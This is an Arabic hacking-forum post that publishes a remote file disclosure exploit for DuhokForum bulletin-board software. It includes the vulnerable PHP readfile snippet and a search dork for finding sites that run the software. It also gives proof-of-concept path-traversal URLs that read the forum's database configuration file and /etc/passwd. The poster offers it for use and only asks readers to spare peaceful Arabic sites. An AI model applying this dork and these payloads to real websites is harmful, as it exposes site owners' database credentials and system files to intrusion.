|
تغرةة منتديــآت (DuhokForum ( File Disclosure ...**!! الســلآم عليــكم ورٍحمـــة اللــــــه وبرٍكـــآته كيفكم يا شباب مرحبا بكم في موضوعي متواضع حبيت اطرحلــكم ثغرٍهـ مكتشفهـآ من ثلاث او اربع آيـــآم ..< مدري اذا في احد مكتشفهــآ قبلي وهي ثغرهـ بمنتديــآت DuhokForum من نوع File Disclosure ..< قرآءة ملفــآت بس المشكلــه كلهــــــآ مواقع عربيــه ..< يعني ترىآ ابري ذمتي من يستخدمهــآ بمواقع عربيه مسالمه http://www.sa-hacker.com/vb/images/smilies/captain.gifhttp://www.sa-hacker.com/vb/images/smilies/captain.gifhttp://www.sa-hacker.com/vb/images/smilies/captain.gifhttp://www.sa-hacker.com/vb/images/smilies/captain.gifhttp://www.sa-hacker.com/vb/images/smilies/captain.gif سورٍس الثغــــــــــرٍهـ ================================================ DuhokForum <= Remote File Disclosure Vulnerability ================================================ [+] DuhokForum <= Remote File Disclosure Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> 0 0 \/___/ 1 1 1 0 [+] Site : wWw.Sa-HaCKeR.cOm 0 1 [+] Support e-mail : AgRaMkSa[at]w.cn 1 0 0 1 ###################################### 1 0 M...Q...S Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: DarK c0d3r [+] Download:http://www.4shared.com/file/11767397...SATRTIMES.html [+] Greetz: TiGeR HaCKeR . Mr.SHankeR [+] Code: if($file == "box_Table.htm"){ $filename = "box_Table.htm"; } header('Content-type: text/html'); header('Content-transfer-encoding: binary'); header("Cache-Control: must-revalidate"); header($ExpStr); readfile($filename); ======================================= DorK : "inurl:index.php?mode=members" [+] PoC: Http://site/paTH/editor/file.php?fil...de/connect.php <===== config [+] PoC: Http://site/paTH/editor/file.php?fil.../../etc/passwd ================================================== ================== شرٍح فيديوٍ لثغــــــرٍهـ علىآ السرٍيع هنــــــــــــــآ انتظرو الثــآنيــــه بآذن اللــــــــــــــــــه ..> لا لا للبرٍآيفت http://www.sa-hacker.com/vb/images/smilies/clap.gifhttp://www.sa-hacker.com/vb/images/smilies/clap.gif See you منقول من الاخ DaRk-C0d3r الاهداء M!M0 ==ملك الاختراقات VoLc4n0##### NEVER HaCKEr ولجميع اعضاء شبكة العنكبوتية |
| الساعة الآن 07:46 AM |
[ vBspiders.Com Network ]